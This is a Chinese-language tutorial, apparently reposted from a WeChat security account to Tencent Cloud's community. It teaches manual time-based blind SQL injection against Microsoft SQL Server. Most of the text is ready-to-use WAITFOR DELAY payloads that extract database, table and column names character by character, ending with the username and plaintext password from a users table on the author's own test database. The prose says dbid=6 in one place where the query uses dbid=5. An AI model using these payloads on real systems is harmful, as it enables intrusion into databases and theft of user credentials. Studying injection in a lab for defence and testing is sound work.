专栏首页漏洞知识库Microsoft SQL Server手注之延时型时间盲注

Microsoft SQL Server手注之延时型时间盲注

延迟注入简介

延时函数 WAITFOR DELAY

WAITFOR是SQL Server中Transact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间,然后继续执⾏后 续的语句。它包含⼀个参数DELAY,⽤来指定等待的时间。

如果将该语句成功注⼊后,会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况,所以容易注⼊成功。根据Web请求是否有延迟,渗透测试⼈员就可以判断⽹站是否存在注⼊漏洞。同时,由于该语句并不返回特定内容,所以它也是盲注的重要检测⽅法。

语法:

WAITFOR DELAY '0:0:n'

⽰例:

WAITFOR DELAY '0:0:4' --  表⽰延迟4秒

IF exists ()⼦句

语法:

IF exists () WAITFOR DELAY '0:0:5'

手工延时注入

1.判断是否存在注⼊

WAITFOR DELAY '0:0:4'

2.猜测数据库名

猜测数据库名是否存在

if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

这条语句的意思呢是判断dibd=6的数据库是否存在!如果存在那么就延迟3秒返回!

根据dbid猜库名,先猜出长度

if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--

因为我数据库里只有两个我创建的数据库:test(dbid5)、saulgoodman(dbid6)

所以我就能用上面的语句来判断dbid5的长度是否为5,如果为5那么就延迟3秒返回!

同理猜解dbid6(saulgoodman)的长度可以用这条语句:

if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--

如果有多数据库那么就同理上面的语句以此类推就好了~

根据dbid查询挨个查询数据库名

因为我们dbid=4这个数据库是test,那么我们就可以来一个一个的猜解他的数据库名:

猜解第一个字符:t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
猜解第二个字符:e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
猜解第三个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第四个字符:t

如果想查询dbid6的数据库saulgoodman那么我们就直接改dbid号就好了:

猜解第一个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第二个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第三个字符:u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
猜解第四个字符:l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
猜解第五个字符:g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
猜解第六个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第七个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第八个字符:d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
猜解第九个字符:m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
猜解第十个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第十一个字符:n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--

3.猜解表名

因为我们知道了数据库名是test,然后我们就可以使用下面的语句来查询第一个表名的长度是否等于5(表名是users):

if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--

由上图可见,页面返回正常说明它的表名长度是5,那么我们就可以挨个猜解他的字符:users

猜解第一个字符:u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
猜解第五个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--

因为我们知道了数据库名是test,第一个表名是 users,然后我们就可以使用下面的语句来查询第二个表名的字符(表名是info):

猜解第一个字符:i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--

4.猜解列名

因为我们知道了表名是 users,那么我们可以猜解 users 表名下的列名:(列名是 username)

猜解第一个字符:u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
猜解第五个字符:n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
猜解第六个字符:a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
猜解第七个字符:m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
猜解第八个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--

这样就猜解出来了第一个列名,username

第二种方式:我们有 idusernamepasswordage 四个列

获取第一列:(列名是id)

获取第一个字符:i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
获取第二个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--

获取第二列:(列名是username)

获取第一个字符:u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
获取第二个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
获取第三个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第四个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
获取第五个字符:n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
获取第六个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
获取第七个字符:m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
获取第八个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--

获取第三列:(列名是password)

获取第一个字符:p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
获取第二个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
获取第三个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
获取第四个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
获取第五个字符:w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
获取第六个字符:o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
获取第七个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
获取第八个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--

5.逐字猜解数据

我们知道了表名是:users,列名是:usernamepasswrd,那么我们就开始爆数据了:(saul)

判断username列第一个字符:s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
判断username列第二个字符:a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
判断username列第三个字符:u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
判断username列第四个字符:l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--

这样就获取到了第一个用户名为:saul

获取 saul 的密码:(密码是saul520)

判断 password 列第一个字符:s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
判断 password 列第二个字符:a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
判断 password 列第三个字符:u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
判断 password 列第四个字符:l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
判断 password 列第五个字符:5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
判断 password 列第六个字符:2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
判断 password 列第七个字符:0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--

本文分享自微信公众号 - SaulGoodman(TheSaulGoodman),作者:PowerLiu

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Microsoft SQL Server手注之布尔型盲注

    上面的这条语句的意思是查询 dbid=5 是否存在,最后那个=1就是是否存在的意思!存在说明返回正常!

    漏洞知识库
  • DOS查找Windows远程桌面的端口

    漏洞知识库
  • 图片大小可控可导致CUP爆满造成网站瘫痪

    注意这个参数:size=200,可以看到下面服务器访问速度是76ms,图片是948B说明很快,那么我们把200改成10000

    漏洞知识库
  • mysql

        mysqladmin -u root -p ab12 password djg345

    java好学者
  • hiveQL求差集

    hive sql求差集的方法 1、什么是差集 set1 - set2,即去掉set1中存在于set2中的数据。 2、hive中计算差集的方法,基本是使用左外链接...

    用户1225216
  • python每日笔记

    select t.c_id as id,t.c_name name,t.c_address address,c.c_id class_id,c.c_name c...

    小闫同学啊
  • java之mybatis之动态sql

    2. choose, when, otherwise -----when可以有多个

    Vincent-yuan
  • SQL语句大全,所有的SQL都在这里

    1、说明:创建数据库 CREATE DATABASE database-name

    用户6543014
  • mysql数据库

    拾点阳光
  • SQL语句大全,所有的SQL都在这里(1.5万字长文)

    1、说明:创建数据库 CREATE DATABASE database-name

    帅地

扫码关注云+社区

领取腾讯云代金券